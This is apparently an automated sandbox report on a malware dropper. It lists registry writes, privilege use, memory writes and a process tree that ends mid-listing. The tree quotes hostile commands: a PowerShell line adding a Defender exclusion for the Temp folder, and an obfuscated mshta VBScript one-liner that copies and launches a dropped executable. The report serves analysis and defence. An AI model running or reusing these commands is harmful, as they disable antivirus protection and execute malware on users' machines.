84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Sat196ac06a9e6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sat19e6a852f849bb2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Sat196ac06a9e6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 anyname.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 121 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs
Processes:
GcleanerEU.exeinstaller.exeanyname.exegcleaner.exepid process 1264 GcleanerEU.exe 856 installer.exe 2604 anyname.exe 2120 gcleaner.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeultramediaburner.tmpWerFault.exeSat19c6762a08beae.exeWerFault.exepid process 1884 powershell.exe 1644 ultramediaburner.tmp 1644 ultramediaburner.tmp 1632 WerFault.exe 1632 WerFault.exe 1632 WerFault.exe 1632 WerFault.exe 1632 WerFault.exe 1632 WerFault.exe 1632 WerFault.exe 988 Sat19c6762a08beae.exe 988 Sat19c6762a08beae.exe 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 1212 2216 WerFault.exe 2216 WerFault.exe 2216 WerFault.exe 2216 WerFault.exe 2216 WerFault.exe 2216 WerFault.exe 2216 WerFault.exe 1212 1212 1212 1212 -
Suspicious behavior: GetForegroundWindowSpam 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeiexplore.exepid process 1212 1632 WerFault.exe 2216 WerFault.exe 2864 WerFault.exe 948 WerFault.exe 2552 iexplore.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
Sat19c6762a08beae.exeavwvuuwavwvuuwpid process 988 Sat19c6762a08beae.exe 7964 avwvuuw 4964 avwvuuw -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Sat196ac06a9e6.exetaskkill.exepowershell.exeSat191649b47c9e2.exe795168.exetaskkill.exeWerFault.exetaskkill.exe7915684.exe6384253.exeWerFault.exe6384253.exeWerFault.exeWerFault.exeMaeqeshyhoto.exedescription pid process Token: SeCreateTokenPrivilege 676 Sat196ac06a9e6.exe Token: SeAssignPrimaryTokenPrivilege 676 Sat196ac06a9e6.exe Token: SeLockMemoryPrivilege 676 Sat196ac06a9e6.exe Token: SeIncreaseQuotaPrivilege 676 Sat196ac06a9e6.exe Token: SeMachineAccountPrivilege 676 Sat196ac06a9e6.exe Token: SeTcbPrivilege 676 Sat196ac06a9e6.exe Token: SeSecurityPrivilege 676 Sat196ac06a9e6.exe Token: SeTakeOwnershipPrivilege 676 Sat196ac06a9e6.exe Token: SeLoadDriverPrivilege 676 Sat196ac06a9e6.exe Token: SeSystemProfilePrivilege 676 Sat196ac06a9e6.exe Token: SeSystemtimePrivilege 676 Sat196ac06a9e6.exe Token: SeProfSingleProcessPrivilege 676 Sat196ac06a9e6.exe Token: SeIncBasePriorityPrivilege 676 Sat196ac06a9e6.exe Token: SeCreatePagefilePrivilege 676 Sat196ac06a9e6.exe Token: SeCreatePermanentPrivilege 676 Sat196ac06a9e6.exe Token: SeBackupPrivilege 676 Sat196ac06a9e6.exe Token: SeRestorePrivilege 676 Sat196ac06a9e6.exe Token: SeShutdownPrivilege 676 Sat196ac06a9e6.exe Token: SeDebugPrivilege 676 Sat196ac06a9e6.exe Token: SeAuditPrivilege 676 Sat196ac06a9e6.exe Token: SeSystemEnvironmentPrivilege 676 Sat196ac06a9e6.exe Token: SeChangeNotifyPrivilege 676 Sat196ac06a9e6.exe Token: SeRemoteShutdownPrivilege 676 Sat196ac06a9e6.exe Token: SeUndockPrivilege 676 Sat196ac06a9e6.exe Token: SeSyncAgentPrivilege 676 Sat196ac06a9e6.exe Token: SeEnableDelegationPrivilege 676 Sat196ac06a9e6.exe Token: SeManageVolumePrivilege 676 Sat196ac06a9e6.exe Token: SeImpersonatePrivilege 676 Sat196ac06a9e6.exe Token: SeCreateGlobalPrivilege 676 Sat196ac06a9e6.exe Token: 31 676 Sat196ac06a9e6.exe Token: 32 676 Sat196ac06a9e6.exe Token: 33 676 Sat196ac06a9e6.exe Token: 34 676 Sat196ac06a9e6.exe Token: 35 676 Sat196ac06a9e6.exe Token: SeDebugPrivilege 2680 taskkill.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeDebugPrivilege 620 Sat191649b47c9e2.exe Token: SeDebugPrivilege 2872 795168.exe Token: SeDebugPrivilege 1620 taskkill.exe Token: SeDebugPrivilege 1632 WerFault.exe Token: SeDebugPrivilege 2712 taskkill.exe Token: SeDebugPrivilege 560 7915684.exe Token: SeDebugPrivilege 2932 6384253.exe Token: SeShutdownPrivilege 1212 Token: SeDebugPrivilege 2216 WerFault.exe Token: SeShutdownPrivilege 1212 Token: SeShutdownPrivilege 1212 Token: SeShutdownPrivilege 1212 Token: SeShutdownPrivilege 1212 Token: SeDebugPrivilege 2944 6384253.exe Token: SeDebugPrivilege 2864 WerFault.exe Token: SeShutdownPrivilege 1212 Token: SeShutdownPrivilege 1212 Token: SeDebugPrivilege 948 WerFault.exe Token: SeShutdownPrivilege 1212 Token: SeDebugPrivilege 3048 Maeqeshyhoto.exe Token: SeShutdownPrivilege 1212 Token: SeShutdownPrivilege 1212 Token: SeShutdownPrivilege 1212 Token: SeShutdownPrivilege 1212 Token: SeShutdownPrivilege 1212 Token: SeShutdownPrivilege 1212 Token: SeShutdownPrivilege 1212 Token: SeShutdownPrivilege 1212 -
Suspicious use of FindShellTrayWindow 20 IoCs
Processes:
ultramediaburner.tmpiexplore.exeinstaller.exepid process 1644 ultramediaburner.tmp 1212 1212 1212 1212 2552 iexplore.exe 1212 1212 1212 1212 856 installer.exe 1212 1212 2552 iexplore.exe 2552 iexplore.exe 2552 iexplore.exe 2552 iexplore.exe 2552 iexplore.exe 2552 iexplore.exe 2552 iexplore.exe -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
pid process 1212 1212 1212 1212 -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEpid process 2552 iexplore.exe 2552 iexplore.exe 568 IEXPLORE.EXE 568 IEXPLORE.EXE 568 IEXPLORE.EXE 568 IEXPLORE.EXE 2552 iexplore.exe 2552 iexplore.exe 2764 IEXPLORE.EXE 2764 IEXPLORE.EXE 2764 IEXPLORE.EXE 2764 IEXPLORE.EXE 2764 IEXPLORE.EXE 2764 IEXPLORE.EXE 2056 IEXPLORE.EXE 2056 IEXPLORE.EXE 2056 IEXPLORE.EXE 2056 IEXPLORE.EXE 832 IEXPLORE.EXE 832 IEXPLORE.EXE 832 IEXPLORE.EXE 832 IEXPLORE.EXE 2452 IEXPLORE.EXE 2452 IEXPLORE.EXE 2452 IEXPLORE.EXE 2452 IEXPLORE.EXE 920 IEXPLORE.EXE 920 IEXPLORE.EXE 920 IEXPLORE.EXE 920 IEXPLORE.EXE 2552 iexplore.exe 2552 iexplore.exe 8164 IEXPLORE.EXE 8164 IEXPLORE.EXE 8164 IEXPLORE.EXE 8164 IEXPLORE.EXE 2552 iexplore.exe 2552 iexplore.exe 2968 IEXPLORE.EXE 2968 IEXPLORE.EXE 2968 IEXPLORE.EXE 2968 IEXPLORE.EXE 2552 iexplore.exe 2552 iexplore.exe 568 IEXPLORE.EXE 568 IEXPLORE.EXE 568 IEXPLORE.EXE 568 IEXPLORE.EXE 2552 iexplore.exe 2552 iexplore.exe 4708 IEXPLORE.EXE 4708 IEXPLORE.EXE 4708 IEXPLORE.EXE 4708 IEXPLORE.EXE 2552 iexplore.exe 2552 iexplore.exe 920 IEXPLORE.EXE 920 IEXPLORE.EXE 920 IEXPLORE.EXE 920 IEXPLORE.EXE 2552 iexplore.exe 2552 iexplore.exe 4660 IEXPLORE.EXE 4660 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.exedescription pid process target process PID 1996 wrote to memory of 1744 1996 setup_x86_x64_install.exe setup_installer.exe PID 1996 wrote to memory of 1744 1996 setup_x86_x64_install.exe setup_installer.exe PID 1996 wrote to memory of 1744 1996 setup_x86_x64_install.exe setup_installer.exe PID 1996 wrote to memory of 1744 1996 setup_x86_x64_install.exe setup_installer.exe PID 1996 wrote to memory of 1744 1996 setup_x86_x64_install.exe setup_installer.exe PID 1996 wrote to memory of 1744 1996 setup_x86_x64_install.exe setup_installer.exe PID 1996 wrote to memory of 1744 1996 setup_x86_x64_install.exe setup_installer.exe PID 1744 wrote to memory of 1068 1744 setup_installer.exe setup_install.exe PID 1744 wrote to memory of 1068 1744 setup_installer.exe setup_install.exe PID 1744 wrote to memory of 1068 1744 setup_installer.exe setup_install.exe PID 1744 wrote to memory of 1068 1744 setup_installer.exe setup_install.exe PID 1744 wrote to memory of 1068 1744 setup_installer.exe setup_install.exe PID 1744 wrote to memory of 1068 1744 setup_installer.exe setup_install.exe PID 1744 wrote to memory of 1068 1744 setup_installer.exe setup_install.exe PID 1068 wrote to memory of 1480 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1480 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1480 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1480 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1480 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1480 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1480 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 800 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 800 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 800 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 800 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 800 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 800 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 800 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1920 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1920 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1920 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1920 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1920 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1920 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 1920 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 972 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 972 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 972 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 972 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 972 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 972 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 972 1068 setup_install.exe cmd.exe PID 1480 wrote to memory of 1884 1480 cmd.exe powershell.exe PID 1480 wrote to memory of 1884 1480 cmd.exe powershell.exe PID 1480 wrote to memory of 1884 1480 cmd.exe powershell.exe PID 1480 wrote to memory of 1884 1480 cmd.exe powershell.exe PID 1480 wrote to memory of 1884 1480 cmd.exe powershell.exe PID 1480 wrote to memory of 1884 1480 cmd.exe powershell.exe PID 1480 wrote to memory of 1884 1480 cmd.exe powershell.exe PID 800 wrote to memory of 676 800 cmd.exe Sat196ac06a9e6.exe PID 800 wrote to memory of 676 800 cmd.exe Sat196ac06a9e6.exe PID 800 wrote to memory of 676 800 cmd.exe Sat196ac06a9e6.exe PID 800 wrote to memory of 676 800 cmd.exe Sat196ac06a9e6.exe PID 800 wrote to memory of 676 800 cmd.exe Sat196ac06a9e6.exe PID 800 wrote to memory of 676 800 cmd.exe Sat196ac06a9e6.exe PID 800 wrote to memory of 676 800 cmd.exe Sat196ac06a9e6.exe PID 1068 wrote to memory of 992 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 992 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 992 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 992 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 992 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 992 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 992 1068 setup_install.exe cmd.exe PID 1068 wrote to memory of 920 1068 setup_install.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0D696124\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1884 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe4⤵
- Loads dropped DLL
PID:1920 -
C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat191649b47c9e2.exeSat191649b47c9e2.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:620 -
C:\ProgramData\795168.exe"C:\ProgramData\795168.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2872 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2872 -s 17327⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:948 -
C:\ProgramData\8209560.exe"C:\ProgramData\8209560.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2900 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
PID:2412 -
C:\ProgramData\6384253.exe"C:\ProgramData\6384253.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2932 -
C:\ProgramData\6384253.exe"C:\ProgramData\6384253.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 7127⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2216 -
C:\ProgramData\5771500.exe"C:\ProgramData\5771500.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3032 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\5771500.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\5771500.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))7⤵PID:860
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\5771500.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\5771500.exe") do taskkill -Im "%~nxl" /F8⤵PID:2396
-
C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exEC3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw99⤵
- Executes dropped EXE
PID:2632 -
